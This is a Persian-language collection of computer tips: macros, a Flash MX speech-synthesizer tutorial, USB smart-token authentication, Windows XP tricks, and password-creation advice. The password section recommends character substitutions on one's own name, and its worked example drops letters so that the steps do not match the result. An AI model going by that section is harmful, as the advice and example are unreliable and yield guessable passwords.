ماکرو چیست؟
ماکروها با خودکارکردن بسیاری از فعالیت های کاربران سرعت آنها را به طور چشمگیری افزایش می دهند.
به گزارش بخش خبر شبکه فن آوری اطلاعات ایران، از ایلنا، برای بسیاری از کاربران واژه ماکرو (MACRO) نا آشنا است، در حالی که عملا همواره با آن در تماس هستند و در بسیاری موارد کارهای کامپیوتری آنها را تسهیل می کند.
ماکروها ابزارهای کوچک اما کارآمدی هستند که سرعت کار کاربران را افزایش می دهند.
به عنوان مثال اگر فرد با کارتکراری و پر دردسری در اکسل روبرو باشد, نظیر فرمت کردن یک متن خاص یا وارد کردن یک جدول, ماکرو می تواند این کار را به طور خودکار انجام دهد، بعد از آن که ماکرو مربوطه بر روی سیستم نصب شود با یک بار کلیک کردن یک دکمه شورت کات (میان بر) کار خود به خود انجام خواهد شد.
ماکروها به کاربران اجازه می دهند کارهای خود را در کوتاه ترین زمان انجام دهند, برنامه های کاربردی نظیر WORD, اکسل, آوت لوک, VISIO, PROJECTS وغیره همگی از سیستم نصب یا ضبط ماکرو برخوردارند.
آموزش ساخت یک شبیه ساز گفتار با Flash MX
فلش بسیار وسیع تر از تولید قطعات انیمیشن یا قطعات تعاملی برای استفاده از وب سایت ها می تواند باشد . نسخه های اخیر این نرم افزار قابلیت های بسیار پیشرفته ای را در اختیار کاربران حرفه ای فلش قرار داده است . این نوشته چگونگی ساخت یک شبیه ساز گفتار، در گوشه و کنار به وفور دیده می شوند . سیستم های سخن گوی بانک ها که موجودی مشتریان را به کمک صدای شبیه سازی شده انسان به اطلاع کابران می رسانند و یا کاربرد بسیار عمومی تر نظیر اپراتور تلفن همراه و ساعت گویا و غیره همگی نمونه هایی از سیستم های سینتی سایزر محسوب می شوند.
شما می توانید با تعقیب روش های ارائه شده در این نوشته و گسترش این پروژه ، مهارت و خلاقیت خود را برای یافتن کاربردهای دیگر چنین سیستمی بیازمایید . در نسل قبل از فلش MX،(یعنی نسخه 5) برنامه نویسان Action برای کنترل قطعات صوتی ناگزیر به استفاده از روش های مبتنی بر Keyframe/onEnterFrame بودند . در نسل جدید این نرم افزار،اضافه شدن متد (Sound.onSoundComplete) امکان کنترل بسیار دقیقتر صداها را میسر ساخته است . دقت رویداد OnSoundComplete در حدود یک دهم سرعت فریم است. بدین ترتیب در صورتی که پروژه فلش شما برای سرعت متداول 12فریم در ثانیه تنظیم شده باشد ، آنگاه دقت رویداد فوق در حدود یک صدوبیستم ثانیه خواهد بود که کاربرد مورد نظر ما در این نوشته بسیار مناسب است . در این جا بد نیست که از ابتدا نکته ای یاد آوری کنیم تا ذهنیت دقیق تری حاصل کار داشته باشید.
رویداد OnSoundComplete هم ،مانند دیگر رویدادهای فلش ، در صورتی که عملیات پیچیده و سنگینی همزمان با آن در جریان باشد (مانند انیمیشن های سنگین ) ممکن است دچار تاخیرهای کوتاهی بشود . در نتیجه در زمان بخش صدا، ممکن است Flash player نتواند تمام عملیات بار گذاری شده را با همان دقت مورد نظر شما انجام دهد و نهایتا احتمال ایجاد تاخیرهای ناخواسته به صورت « سکته» وجود دارد.
این مساله کاملا به قدرت و سرعت پردازنده سیستم مقصد بستگی دارد و در سیستم های قدیمی تر تبدیل به مساله ای کاملا جدی خواهد شد.
(حالا نظری به کد شماره یک بیندازید) برای آنکه بتوانید کد فوق را آزمایش کنید، باید یک فایل صوتی در کتابخانه وارد کرده باشید و نام groovy را برای آن انتخاب کنید.
برای این کار بعد از آن که یک فایل صوتی نمونه ساختید، از طریق منوی فایل و گزینه Import to library ، این فایل را به درون محیط فلش وارد کنید.
در مرحله بعدی بر روی فایل صوتی خود که در پنجره کتابخانه باید دیده شود، کلیک راست کنید و از منویی که ظاهر می شود ، گزینه Linkage، پنجره دیگری ظاهر می شود که می توانید پارامترهای مورد نظر خود را در آن تنظیم کنید . در این پروژه ما باید نام groovy را در این پنجره تایپ کنیم .(برای آن که جعبه متنی مورد نظر فعال شود باید گزینه Export for Action را تیک بزنید . با این کار گزینه دیگر Fram Export in the first هم فعال خواهد شد که در کاربرد ما باید چنین باشد .) این وضعیت در شکل 2 نمایش داده شده است . توجه داشته باشید که با این عمل ، از این به بعد می توانید در کدهای خود با قرار دادن نام این قطعه صوتی در درون عملیات های "" "" به آن ارجاع کنید . در زمان کامپایل شدن پروژه و تولید فایل های swf، نرم افزار فلش مراقب تمام سمبل های مورد استفاده خواهد بود و متصل بودن (Attach) آنها به Timeline را زیر نظر دارد و برهمین اساس محتوای پروژه در فایل swf در شبکه ای نظیر اینترنت جریان می یابد، محتوای پروژه و در واقع همان سمبل ها یکی یکی بر اساس همان ترتیب چیده شده توسط نرم افزار Flash player بار گذاری می شوند.
سمبل هایی که فقط با اسکریپ به Timeline متصل شده باشند، به طور پیش فرض توسط فلش در زمان کامپایل شدن دیده نمی شود و در فایل swf قرار نمی گیرند.
در واقع فلش به صورت پیش فرض تصور می کند که چنین سمبل هایی بی استفاده بوده اند.
گزینه های Frame Export in first و Export for Action برای جبران این موضوع تنظیم می شوند . به این ترتیب به فلش یادآوری می شود که سمبل ها از طریق اسکریپ مورد استفاده قرار گرفته اند و باید در فایل کامپایل شده swf گنجانده شوند . در قطعه کد یک، قطعه صدایی با نام groovy توسط اسکریپ به Instance صدایی به نام myloop متصل شده است . در زمان اجرا شدن پروژه ، وقتی که پخش صدای myloop پایان می پذیرد، رویداد OnSoundComplete تلبع ( ) nexSound را فرا می خواند که این عمل باعث پخش مجدد صدا خواهد شد . در اینجا ممکن است با خود فکر کنید، که انجام این کارها برای چیست؟ زیرا این کار را می توانستیم به صورت سر راست تری یعنی همان طور که در کد 2آمده، هم انجام دهیم . در این روش، ترتیبی داده شده است که صدای groovy به تعداد هزار مرتبه پشت سر هم پخش شود.
ویژگی ای که رویداد OnSoundComplete را متمایز می سازد، ذات دینامیک آن است . به این معنی که کاربر می تواند در هر زمان دلخواهی، صدا را تغییر دهد و با این روش پروژه هایی مانند میکسرهای صوتی طراحی کند.
(بدین صورت که تابع بازگشتی، (در اینجا ( ) nextSound) می تواند در پایان هر قطعه صدایی، صدای دیگری را راه اندازی کند.
) سینتی سایزر نرم افزار با فلش نمی دانم آیا تاکنون به نرم افزارهای ویژه ای که برای کاربران کم بینا طراحی شده اند، نگاهی انداخته اید یا نه؟ (در ویندوز این قابلیت تحت عنوان تنظیمات Accessability وجود دارد.
بعضی از سایت های ویژه وب هم به همین منظور قابل استفاده بودند برای کاربران خاص، به چنین مکانیسم هایی مجهز هستند.
همچنین ابزارهایی وجود دارند که در صورت عدم پشتیبانی سایت از قابلیت های فوق، باز هم با ارائه خدماتی آن را برای کاربران خاص قابل استفاده می کند.
) این نرم افزارها وظیفه دارند تا بخش هایی از صفحه نمایش را که در نزدیکی اشاره گرماوس قرار می کیرند بزرگتر نمایش داده و ضمنا در صورت وجود متن در آن بخش ها، آن را به صورت صوتی ادا کند.
به طور معمول حجم این چنین سینیتی سایزرهای نرم افزاری از چند مگا بایت کمتر نیست. اما ما می خواهیم به کمک فلش ابزار بسیار جمع و جوری بسازیم که کارایی نسبتا خوبی در مقایسه با نمونه های تجاری داشته باشد.
سیستم های قدیمی commodore64 و حتی Atary آتاری با آنکه پردازنده های بسیار ضعیفی (در قیاس با نمونه های امروزی) داشتند و کل حافظه آنها 64 کیلو بایت بود (آتاری 32 کیلو بایت حافظه داشت)، قابلیت سینتی سا سلیزر را به خوبی نمایش می گذاشتند.
رمز موفقیت چنین سیستم هایی در آن بود که از ترکییب قطعات کوچک صدای انسان که از پیش در حافظه سیستم وجو داشت و allphone نام داشت، استفاده می شد.
Allophone ها اصواتی نظیر صدای «ou» یا «th» بودند . بدین ترتیب نرم افزارهای ساده و ابتدایی که برروی سیستم هایی مانند کمودر64اجرا می شد، قادر بودندترکیبات متنی را تجزیه کرده و با چیندن آلوفن ها در کنار یکدیگر، گفتار صوتی را به خوبی شبیه سازی کنند.
چرا ما این کار با در اختیار داشتن رویدادOnSoundComplete درفلش انجام ندهیم ؟ تنها مشکل شما تهیه آلوفن خواهد بود.
برای این کار چندین راه حل پیش روی شما قراردارد.
یکی از ساده ترین راه حل ها، جستجو در اینترنت است . برای اینکار می توانید از عبارت نظیر «speech emulation» یا«allophone» در موتورهای جستجو استفاده کنید.
(سایت vivismo.com تعدادزیادی ازنشانی های شبیه سازی ها یا emulator رامی تواندبرایتان بیابید). البته در اینترنت تعداد پروژه های سینتی سایزر سخت افزاری که به کمک پردازنده های بسیار کوچک ( مثلاPIC که در بازار ایران نیز به وفور یافت می شود ) قابل ساخت هستند، فراوان هستند.
به طور معمول در این نوع پروژه های سخت افزاری، آلوفن ها به صورت فایل تهیه می شوند و درون حافظه های ویژه ای (مثلا EEPROM) ذخیره می شوند . شما در صورتی که کمی حوصله داشته باشید خواهید توانست از فایل های آماده چنین پروژه هایی نیز استفاده کنید.
نشانی یکی از این سایت ها چنین است :
alphanik.com.au/derekw/pictalker/mainhtm روش دوم و شاید هم روش بهتر تهیه آلوفن ها ، آن است که خودتان دست به کار شوید و آلوفن های مورد نیاز خود را ظبط کنید، در این صورت اگر چه ممکن است ب هعلت کم تجربگی ، نتیجه اولیه چندان رضایت بخش نباشد ،امدر عوض آلوفن های فارسی در دست خواهید داشت.( این مطلب که آیا تا کنون آلوفن های فارسی تهیه شده باشند، موضوعی است که در حال حاضر بر نویسنده مشخص نیست.) بازگشت به فلش منشا فایل های آلوفن هر چه باشد باید آن ها را به درون فلش وارد (import)وارد کنید.
یادآوری می کنیم که برای به دست آوردن نتیجه هر چه بهتر لازم است که فایل های آلوفن، دارای هیچ گونه سکوت اضافی در ابتدا و انتهای خود نباشند.
برای اطمینان از این مساله می توانید از نرم افزارهای ویرایشگر صوت مانند Audition Adobe یا Cool edite کمک بگیرید.
نکته فنی و ظریف دیگر آن است که برای از بین بردن افکت صوتی مزاحم که به صورت صداهای «کلیک» ممکن است شنیده شوند.
باید ابتداو انتهای نمونه های آلوفن ها را شیبدار یا به اصطلاح فنی تر fade in و fade out کنید.
بعد ازاین کار لازم است که تمام نمونه ها را نرمالیزه کنید تا صدای یکنواخت و طبیعی تر به دست آورید.
(نرمال کردن صدا به این معنی است که دامنه یا شدت صدا از حد مشخصی که آستانه اشباع نامیده می شود، بیشتر نشود.
بدین ترتیب بلندترین بخش هریک از نمونه ها با یکدیگر برابر خواهند شد.
) بالاخره در صوترتی که قصد استفاده از این پروژه را در اینترنت داشته باشید، مناسب تر خواهد بود که نمونه های آلوفن ها را بهینه یا Optimize کنید تا از حجم آن ها کاسته شود.
پس از مراحل فوق، کتابخانه ای در فلش خواهید داشت که در آن تمام نمونه ها با نزدیکترین شکل نوشتاری خود نام گذاری شده اند.
سینتی سایزرها ی قدیمی قابلیت تبدیل متون معمولی به گفتار را نداشتند.
در نتیجه برای اینکه واژه خاصی را تلفظ کنند، کاربر ناگزیر به نوشت متن دیگری بود که شباهت کمی به نوشته واقعی داشت. به عنوان مثال، برای تلفظ واژه Knowledge از عبارتی شبیه nnoleg استفاده می شد.
(برای تلفظ واژه های فارسی این مشکل حادتر هم می شود) به این ترتیب یک سینتی سایزر، به انواع مختلفی تقسیم بندی می شود.
سینتی سایزرهایی که قابلیت تبدیل متن به گفتار داشته باشند، سینتی سایزرهای متنی نامیده می شوند و سینتی سایزر از نوعی که تشریح شدو قرار است ما در اینجا آنرا با فلش بسازیم، سینتی سایزر فونتیک نام دارد.
( اگر جویای نام هستیدو یا به ماجراجویی علاقه دارید، می توانید در این زمینه ها، خصوصا در مورد زبان فارسی کارکنید.
مسلما جامعه ما به شدت به چنین فعالیت هایی نیاز دارد.
) در قطعه کد شماره 3 سورس کدی را ملاحظه می کنید که حجم زیادی از آن را برای پردازش رشته های متنی اختصاص یافته است تا بتواند نوشتار فونتیک(که از همان نامگذاری آلوفن ها بدست آمده است) را تشخیص داده و بر اساس آن قادر باشد آلوفن ها را یکی پس از دیگری بخش کند.
در این قطعه کد ازعلامت| برای تفکیک آوفن ها استفاده شده است. البته شما می توانید از روش دیگری هم برای نام گذاری و نتیجه پردازش رشته های متنی استفاده کنید.
به این ترتیب که به جای نام گذاری آلوفن ها در کتابخانه فلش به صورت مثلاaa یا uu یا oo و غیره از اسامی ساده مانند 01-02 کمک بگیرید در روش به کار گرفته شده در اینجا برای اینکه واژه Hello را بشنوید، باید تابع say را به صورت زیر فراخوانی کنید:
;Say(""h|e|ll|oo|"") این تابع در سورس شماره 3 به صورت زیر عمل می کند:
ابتدا آرایه جدید ساخته کی شود،مثلا:
Aphone[0]=""h"" Aphone[0]=""e"" Aphone[0]=""ll"" Aphone[0]=""oo"" در مرحله بعد، نخستین صدا یعنی h به Instance صدا متصل شده توسط رویداد OnSoundComplete پس از تشخیص پایان آن، صداهای بعدی به همین ترتیب پخش می شوند.
این عمل توسط تابع () makePhrase انجام می شود که صدای بعدی را در صف آلوفن در یافت کرده و آن را به Intance صدا متصل می سازد.
یک نکته فنی برای کار حرفه ای تر در سورس کد فوق، تنها از یک Instance صدا استفاده شده است. نرم افزار فلش از چهار کانال صوتی کانال استریو پشتیبانی می کند.
شما می توانید برای کاربردهای حرفه ای تر به جای استفاده از یک Instance صدا از تعداد بیشتری از آنها استفاده کنیدو هر یک از آن ها را به یک ()ViaSound.attachSound نسبت دهید.
به این ترتیب شما خواهید توانست ازتمام قدرت هشت کانال صوتی (Mono) فلش بهره گیرید.
اگر چه در ابتدای این نوشته به کاربردهایی اشاره شد که به طور معمول به کار یک کاربر معمولی نمی آیند، اما کاربر دهای جالب دیگری نیز می توانید برای این پروژه بیابید . به عنوان مثال شاید بتوانید نرم افزاری طراحی کنید که قرار های ملاقات یا برنامه روزانه شما ر ابه صورت صوتی به شما یادآوری می کند.
منبع:iran4me.com
کاربردهای توکن های هوشمند USB
1-1 امنیت در شبکه
امنیت در شبکه های اطلاعاتی از جمله مهم ترین حوزه های امنیتی در سیستم های اطلاعاتی می باشد.در حقیقت وقتی چند کامپیوتر به هم متصل گردیدند و یک شبکه کامپیوتری تشکیل شد، بلافاصله انواع چالش ها و مسائل امنیتی و حفاظتی خودنمایی ما کند که البته این چالش ها در نسبت مستقیمی نیز با اندازه، ساختار و پیچیدگی شبکه و کاربران آن قرار دارند.استفاده از توکن های هوشمند در کنار PKI امنیت قابل قبولی را در شبکه های اطلاعاتی فراهم می نماید.
از مهم ترین دغدغه های سیستم های اطلاعاتی در گستره شبکه های اطلاعاتی، مسئله هویت شناسی و احراز هویت کاربران می باشد.در ارتباطات راه دور و شبکه هایی که به صورت فیزیکی نیز غیر متمرکز بوده و در نقاط مختلفی پراکنده می باشند، مسئله احراز هویت به مراتب مهم تر و پیچیده تر خواهد شد.
در حقیقت احراز هویت مؤثر کاربر و اطمینان از عدم امکان نفوذ ها و تقلب های مختلف توسط افراد خرابکار از مهم ترین دغدغه های امنیتی شبکه های اطلاعاتی می باشد.توکن های هوشمند در این رابطه نیز راهکارهای مطمئنی در احتیار کاربران قرار می دهد که در مقایسه با سایر راهکارهای ارائه شده،دارای امنیت مناسب تری هستند.در این بخش استفاده از توکن های هوشمند در ورود امن به شبکه (Network Logon)،امنیت در شبکه خصوصی مجازی (VPN Security)و دسترسی از یک مجرا (Single Sing On)مورد بررسی قرار خواهد گرفت.
1-1-1ورود امن به شبکه –ویندوز (Network/Windows Logon)
از نظر امنیتی ورود امن کاربر مجاز به شبکه و یا به سیستم ویندوز که اصطلاحاً Logon کردن کاربر نامیده می شود،از اهمیت ویژه ای برخوردار است.
در واقع جهت دسترسی به شبکه یا سیستم ویندوز در نخستین گام، از کاربر احراز هویت به عمل آمده و هنگامی که فرآیند هویت شناسی با موفقیت به انجام رسید، ادامه کار و فعالیت برای وی میسر خواهد گردید.روش رایج استفاده از شناسه کاربر و کلمه عبور می باشد که روشی با درجه امنیتی بسیار پایین است.
امکان نفوذ به سیستم هایی که صرفاً با استفاده ازکلمه عبور در سیستم های اطلاعاتی فعالیت می نمایند، بسیار بالاست و در مواردی که دغدغه مسائل امنیتی وجود دارد، به هیچ وجه عنوان استفاده از این روش جهت هویت شناسی کاربران توصیه نمی گردد.
استفاده از توکن های هوشمند راه حل بسیار مناسبی جهت حل مسئله هویت شناسی و ورود امن کاربر به شبکه و یا سیستم ویندوز فراهم می نماید.در حقیقت با استفاده از این روش می توان هویت شناسی دو عامله را به منظور احراز هویت و ورود کاربران به شبکه و سیستم فراهم نمود.
در این صورت ورود کاربران به شبکه تنها در صورتی میسر خواهد بود که کاربر به توکن شخصی خود دسترسی داشته و آن را به سیستم متصل نموده باشد.بدیهی است که بدین ترتیب افراد غیر مجاز، خرابکاران و کلیه کسانی که به توکن هوشمند مناسب دسترسی ندارند به هیچ عنوان امکان ورود به سیستم را نخواهند یافت.در واقع ورود به شبکه در این حالت وابسته به داشتن توکن شخصی مناسب است و در غیر این صورت امکان ورود به شبکه برای کاربر به هیچ عنوان میسر نخواهد بود.
1.2.1امنیت در شبکه خصوصی مجازی (VPN Security)
شبکه های خصوصی مجازی یا همان VPN ها امروزه توسط شرکت ها و موسسات مختلف مورد استفاده قرار می گیرند.یک VPN مطلوب در واقع شبکه ای به شدت حفاظت شده است که امکان دسترسی افراد یک مجموعه خاص به اطلاعات و برنامه های کاربردی ویژه ای را از نقاط مختلف و در مواردی از طریق اینترنت یا وب فراهم می نماید.امنیت در VPN ها معمولاً با استفاده از PKI تامین می گردد.در واقع در این نوع شبکه ها کلیه تبادلات اطلاعاتی بین کاربر و سیستم به صورت رمزگذاری شده انجام گردیده و همچنین دسترسی به هر برنامه کاربردی یا مجموعه اطلاعات در این شبکه نیازمند انجام عملیات هویت شناسی و احراز هویت کاربر می باشد.همان طور که اشاره شد روش سنتی هویت شناسی، یعنی استفاده از کلمه عبور به هیچ عنوان مناسب این نوع کاربردهای حساس نمی باشد، ضمن اینکه معمولاًٌ در یک VPN کاربر باید جهت دسترسی های مختلف، کلمات عبور متعددی نیز را در خاطر بسپارد.
توکن های هوشمند می توانند ضمن فراهم آوردن امکان انجام هویت شناسی دوعاملی، دغدغه دسترسی به برنامه های کاربردی مختلف با کلمات عبور متفاوت را نیز حل نمایند.در حقیقت می توان با استفاده از تنها یک توکن هوشمند و با به خاطر سپاری تنها یک کلمه عبور که در واقع همان کلمه عبور توکن هوشمند می باشد، امکان هویت شناسی و دسترسی به برنامه های کاربردی متعدد را درون VPN فراهم نمود.در این حالت در واقع داده های مورد نیاز جهت هویت شناسی و دسترسی به برنامه های کاربردی متعدد در درون توکن هوشمند به گونه ای امن نگهداری شده و در موقع نیاز، عملیات هویت شناسی با استفاده از این اطلاعات موجود در توکن انجام می پذیرد. کلیه این عملیات برای کاربر عادی شفاف بوده و وی در واقع تماسی با آنچه در این عملیات رخ می دهد نخواهد داشت.
1.3.1 دسترسی های مختلف تنها از یک مجرا (Single Sign On)
این روش در واقع امکانی است که به منظور کاهش پیچیدگی استفاده از شناسه ها وکلمات عبور متعدد به منظور دسترسی به مجموعه ای از برنامه های کاربردی و خدمات گوناگون در شبکه های کامپیوتری مورد استفاده قرار می گیرد.در حقیقت کاربر به جای این که لازم باشد جهت دسترسی و استفاده از هر برنامه کاربردی یا سرویس ارائه شده توسط کارگزاران متعدد شبکه، عملیات هویت شناسی و احراز هویت را به طور مجزا انجام دهد، در روش دسترسی های مختلف تنها از یک مجرا تنها کافیست که در یک کارگزار ویژه که به همین منظور در اولین نقطه تماس کاربر با شبکه تعبیه شده است، عمل هویت شناسی انجام شده و سپس امکان دسترسی به خدمات و سرویس های سایر کارگزاران شبکه نیز برای کاربر مهیا می گردد.بدیهی است که انجام این عمل هویت شناسی واحد نیازمند دقت نظر و توجه بیشتری می باشد و در نتیجه استفاده از روش های مؤثر هویت شناسی مانند هویت شناسی دو عاملی در این مورد به طوری جدی مورد تاکید است.
توکن های هوشمند می توانند ضمن فراهم آوردن امکان انجام روش مؤثر هویت شناسی دوعاملی، دغدغه هویت شناسی مؤثر در روش دسترسی های مختلف تنها از یک مجرا را رفع نمایند.در حقیقت در این روش می توان با استفاده از تنها یک توکن هوشمند و با به خاطرسپاری تنها یک کلمه عبور که در واقع همان کلمه عبور توکن هوشمند می باشد، امکان هویت شناسی و دسترسی به برنامه های کاربردی و خدمات متعدد کارگزاران یک شبکه را فراهم نمود.
2.1امنیت دراینترنت و وب
دغدغه امنیت در وب و اینترنت به عنوان بزرگ ترین شبکه های اطلاعاتی امروزه و احتمالاً تا مدت ها بعد، از جمله مهم ترین دغدغه های امنیتی در قلمروی فناوری اطلاعات و ارتباطات خواهد بود. در بسیاری از موارد استفاده از توکن های هوشمند در کنار PKI امنیت قابل قبولی را در اینترنت و وب فراهم می نمایند.
از مهم ترین دغدغه های امنیتی در گستره وب و اینترنت، مسئله هویت شناسی و احراز هویت کاربران می باشد.در حقیقت احراز هویت کاربر مرتبط از افراد و کاربران نامربوط و اطمینان از عدم امکان نفوذها و تقلب های مختلف توسط افراد خرابکار از مهم ترین دغدغه های امنیتی عرضه کنندگان خدمات وب و اینترنت می باشد.توکن های هوشمند در این رابطه نیز راهکارهای مطمئن و مؤثری در اختیار کاربران قرار می دهند.در ادامه این بخش راهکارهای امنیتی مبنی بر توکن های هوشمند در گستره وب و اینترنت مورد بررسی قرار می گیرند.امنیت پست الکترونیک، هویت شناسی در وب، دسترسی های مختلف از یک مجرا در وب با Web Sing On از جمله مواردی هستند که مورد بررسی قرار خواهند گرفت.
2.1.1امنیت پست الکترونیک
یکی از مهم ترین حوزه های مورد توجه در قلمرو سیستم های اطلاعاتی پست الکترونیک می باشد که مفهوم امنیت در آن تقریباً از بدو پیدایش این فناوری مورد توجه قرار داشته است؛ این حوزه جزو نخستین عرصه های سیستم های اطلاعاتی محسوب می گردد که راه حل های عملی امنیتی در آن مورد تاکید و توجه بوده است.پست الکترونیک به نوعی همچون سیستم پست غیر الکترونیک دغدغه های امنیتی مشابهی دارد.از جمله مهم ترین این نگرانی های امنیتی می توان به اطمینان از ارسال و دریافت صحیح نامه، اطمینان از هویت فرستنده و دریافت کننده نامه، اطمینان از عدم تغییر محتویات نامه، اطمینان از عدم باز شدن و خوانده شدن نامه توسط دیگران، ارسال نامه های محرمانه و رمزگذاری و رمز گشایی آنها و مواردی مانند آن اشاره نمود.
در سیستم های پست الکترونیک توجه به موارد امنیتی در مبدأ و مقصد نهایی نامه الکترونیک که در واقع کامپیوتر مورد استفاده توسط کاربر فرستنده یا دریافت کننده پست الکترونیک می باشد، از اهمیت ویژه ای برخوردار است. با استفاده از PKI و توکن های هوشمند، دغدغه امنیت مراسلات در پست الکترونیک تا مقدار زیادی کاهش می یابد.در واقع فرد دارنده توکن می تواند نامه های رمزگذاری یا امضا شده ارسال داشته و همچنین نامه های دریافتی را نیز تنها خود رمزگشایی نماید.در واقع رمز گشایی و تولید امضای دیجیتال تنها و تنها توسط مالک توکن هوشمند میسر خواهد بود.
هویت شناسی در وب (Web Authentication)
هویت شناسی در وب و اینترنت از اهمیت فوق العاده ای برخوردار می باشد. در حقیقت در دنیای مجازی وب و اینترنت کاربران به نوعی کاملاً گمنامند و هویت واقعیشان گاه به کلی متفاوت از آنچه وانمود می کنند است.هر چند این خصیصه شاید یکی از ویژگی های مثبت وب و اینترنت تلقی شود؛ ولی در مواردی و حداقل در برخی کاربردها و خدمات، کاملاً می تواند مشکل آفرین باشد. موارد بسیار متعدد و فراوانی را می توان نام برد که در آن اطلاع از اینکه کاربر چه کسی است و آیا اجازه لازم برای برقراری ارتباط را دارد یا نه، از اهمیت بالایی برخوردار است.در کلیه این موارد هویت شناسی و احراز هویت کاربران اهمیت خواهد داشت و البته همان طور که در بخش های قبل نیز گفته شد، هویت شناسی با استفاده از روش سنتی یعنی شناسه کاربر و کلمه عبور از نظر امنیتی کاملاً نامناسب و نامطلوب است.
توکن های هوشمند ضمن فراهم نمودن امکان انجام هویت شناسی دو عامله که در واقع احراز هویت را منوط به در اختیار داشتن یک توکن هوشمند فیزیکی مناسب می نماید، امکان ذخیره و ارائه خدمات هویت شناسی و تعیین سطوح دسترسی متعدد به برنامه های کاربردی مختلف را نیز فراهم می نماید. محصول آوا از شرکت امن افراز که ابزار هویت شناسی دو عامله در وب می باشد، نمونه ای از کاربرد توکن های هوشمند در هویت شناسی وب می باشد.
2.2.1 دسترسی های مختلف تنها از یک مجرا در وب (Web Sign On)
دسترسی های مختلف تنها از یک مجرا در وب همانند مورد مشابه در شبکه های کوچک تر، در واقع امکانی است که به منظور کاهش پیچیدگی استفاده از شناسه ها و کلمات عبور متعدد به منظور دسترسی به مجموعه ای از برنامه های کاربردی و خدمات گوناگون ارائه شده توسط یک شرکت یا مؤسسه در وب مورد استفاده قرار می گیرد.توکن های هوشمند می توانند ضمن فراهم آوردن امکان انجام روش مؤثر هویت شناسی دو عاملی، دغدغه هویت شناسی مؤثر در روش دسترسی های مختلف تنها از یک مجرا را رفع نمایند.در این روش می توان با استفاده از تنها یک توکن هوشمند و با به خاطر سپاری تنها یک کلمه عبور که همان کلمه عبور توکن هوشمند است، امکان هویت شناسی و دسترسی به برنامه های کاربردی و خدمات متعدد کارگزاران یک شبکه را فراهم نمود. توکن های هوشمند امکان نگهداری شناسه ها و اطلاعات لازم برای برنامه های کاربردی متعدد را نیز دارا می باشند.
منبع:دنیای کامپیوتر و اطلاعات شماره 87
چند ترفند جالب
1- برای ایجاد یک Folder بدون نام اول یک Folder ایجاد می کنیم و بر روی آن Right Click می کنیم و گزینه Rename را انتخاب می کنیم در همین حال کلید Alt را پایین نگه داشته و از شماره های سمت راست صفحه کلید شماره 255 را می زنیم و بعد Enter می کنیم .
2- چگونه گزارش مشکل در Windows Xp را غیر فعال کنیم ؟
Control panel خود را باز کنید. بر روی Performance and Maintenance کلیک کنید . سپس به قسمت System بروید . بر روی Advenced کلیک کنید . بر روی error reporting در زیر پنجره کلیک کنید . Disable error reporting را انتخاب کنید و با فشار بر روی Ok از صفحات خارج شوید
3- کلید میانبر Internet Explorer
Ctrl+Enter این کلید در نوار آدرس اینترنت اکس پلورر باعث گذاشته شدن خودکار کلمه های www & com میشود .
4- پاک کردن URL از نوار آدرس
اگر بخواهید یکی از URL هایی که در نوار آدرس دیده میشود را پاک کنید باید از ریجستری استفاده کنیم.
این کلید را در ریجستری پیدا کنید
HKEY_CURRENT_USER\Default\Software\Microsoft\Internet Explorer\Typed URLs
به این ترتیب در ستون سمت راست می توانید فهرس نشانی هایی که تایپ کرده اید را ببینید...روی هر کدام از آدرس هایی که نمی خواهید راست کلیک کنید و گزینه Delete راانتخاب کنید.
منبع:iran4me.com
از چه پسوردی استفاده کنیم که ضمن امن بودن، فراموش نکنیم ؟
همانطور که می دانید انتخاب کلمات عبور ساده باعث به خطر افتادن امنیت حساب های کاربری و اکانت ها می شود و صد البته امکان حدس زدن این نوع پسوردها توسط دیگران زیاد است از طرفی پسوردهای امن به سختی به حافظه فرو می روند و زود از یاد می روند؛ پس چه کار باید کرد؟در این آموزش می خواهم دو روش برای انتخاب رمزپیشنهاد بدم که خیالتون از همه بابت راحت بشه و البته هرگز فراموش نکنید.ویژگی یک رمزخوب اینه که از حروف کوچک و بزرگ و اعداد و نمادهای وپژه درست شده باشه و طول مناسبی هم داشته باشد مثلا
GV18hb&s2@Wr12
حالا چطور همچنین پسوردی بسازیم و البته مهم تر از اون به یاد بسپاریم؟
روش اول
1.ابتدا باید یک یا دو کلمه به سادگی می توانید به یاد داشته باشید را انتخاب کنید مثلاً اسم خودتون یا اسم بهترین دوستتون من از اسم خود م استفاده می کنم.
Alireza ghasemi
2.اگر دقت کنید برخی از حروف انگلیسی به برخی از اعداد انگلیسی شباهت زیادی دارند پس حروف i,E,z,g,s را به ترتیب با اعداد 1، 3، 7، 9، 5عوض می کنم.
با انجام این مرحله رمز من خواهد شد:
Al1r37a 9ha53m1
3-فاصله ها را با کاراکترهای مثل & یا + پر کنید با انجام این مرحله رمز شما خواهد شد:
Al1r37a9+ha53m1
4-به جای حرف A یا a می توانید از @ استفاده کنم با انجام این مرحله رمز شما خواهد شد:
I1r9+@37h@53m1@
5-مابقی حروف را هم به صورت بزرگ می نویسم این هم از پوسورد نهایی ـــــ>
L1r9+@37H@53M1@
روش دوم
کلمه ای را در نظر بگیرید اما به جای استفاده از حروف مورد نظر از حروف سمت راست یا سمت چپ استفاده کنید
به عنوان مثال Alireza Ghasem < s،otrxs hsdr,o امیدوارم مفید واقع شود.
شبیه سازی عملکرد No to All در پنجره جایگزینی فایل در ویندوز XP
اگر با ویندوز XP زیاد کرده باشید حتماً به یک نکته ریز اما مهم برخورد کرده اید.در صورتی که قصد کپی یا انتقال یک فایل را درمیحط ویندوز داشته باشید، اگر در محل ذخیره فایل، فایلی با نام مشابه فایل کپی شده وجود داشته باشد، ویندوز ناچار است جهت کپی فایل جدید، آن را با فایل قبلی جایگزین یا به اصطلاح Replace کند.پیش از این کار، پنجره ای به نام Confirm File Replace باز خواهد شد که از شما می پرسد از جایگزینی این فایل اطمینان دارید؟ در این زمان چهار دکمه برای انتخاب وجود دارد Yes to All, NO, Cancel و Yes.
